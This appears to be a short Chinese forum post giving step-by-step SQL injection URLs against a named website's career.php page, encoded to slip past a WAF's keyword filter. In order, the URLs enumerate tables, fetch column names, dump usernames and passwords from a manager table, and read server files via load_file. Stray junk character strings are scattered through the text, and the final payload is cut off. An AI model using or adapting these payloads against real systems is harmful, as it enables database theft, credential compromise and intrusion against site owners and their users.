waf过滤了 union select from 等关键词
, z0 ]# c: ?* }2 _8 Y8 E p1 O
% g8 c0 r7 B+ G3 B
, `: _1 z8 W- u l1.列当前库所有表( I" A6 f% u5 t
http://jyht.co.uk/career.php
' `5 ~( i+ ~- \+ i* D& V& p+ N?id=11/**/and/**/1=2/**/%75%6E%69%6F%6E/**/SELECT/**/1,2,3,4,%28%53%45%4C%45%43%54%20%47%52%4F%55%50%5F%43%4F%4E%43%41%54%28%69%2E%54%41%42%4C%45%5F%4E%41%4D%45%2C%30%78%33%43%36%32%37%32%32%46%33%45%29%20%46%52%4F%4D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%54%41%42%4C%45%53%20%41%53%20%69%20%57%48%45%52%45%20%69%2E%54%41%42%4C%45%5F%53%43%48%45%4D%41%20%3D%20%64%61%74%61%62%61%73%65%28%29%29,6,7,8,9,10,11,12,13,14,15,16,17,18) L0 Y7 _& A, |$ x* U# e
$ a5 {0 O, X% c. S- t& H2.获取字段; [6 g$ v# j6 x& s# v: M3 m
http://jyht.co.uk/career.php4 @' l) X4 J: y; E% Z+ W4 i2 c
?id=11/**/and/**/1=2/**/%75%6E%69%6F%6E/**/SELECT/**/1,2,3,4,group_concat(COLUMN_NAME,0x3C2F62723E),6,7,8,9,10,11,12,13,14,15,16,17,18/**/%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%43%4F%4C%55%4D%4E%53%20%77%68%65%72%65%20%54%41%42%4C%45%5F%4E%41%4D%45%3D%30%78%36%44%36%31%36%45%36%31%36%37%36%35%37%32$ ~& F3 s# p# [# \9 j! x) |; Y3 F
$ G) W6 @1 I2 M8 b3.直接获取数据3 U8 `' z! g: {8 N/ `
http://jyht.co.uk/career.php
/ W/ [2 [5 D9 D1 X r6 y) A+ A3 B?id=11/**/and/**/1=2/**/%75%6E%69%6F%6E/**/SELECT/**/1,2,3,group_concat(id,0x3d,username,0x3d,password,0x3C62722F3E),5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/%66%72%6F%6D/**/%6D%61%6E%61%67%65%728 G2 r) Y8 | h& v$ ^3 X
) `! O6 C' z2 Q6 U% c% p3 I* a
8 [* p5 P) Q3 M1 i0 i+ ]7 n# y! _4.读文件 可以不用hex 直接在页面显示(必须是root)
8 a) l- l2 m4 b- r# ?9 ^- z. Khttp://jyht.co.uk/career.php* c1 s- u# ^5 s( z/ X
?id=-11/**//**/%75%6E%69%6F%6E/**/SELECT/**/1,2,3,4,hex(load_file(0x443A5C776562736974655C6A696E797568656E67746F6E675C6A7968742E636F2E756B5C636C6173735C64625F6D7973716C2E636C6173732E70687 |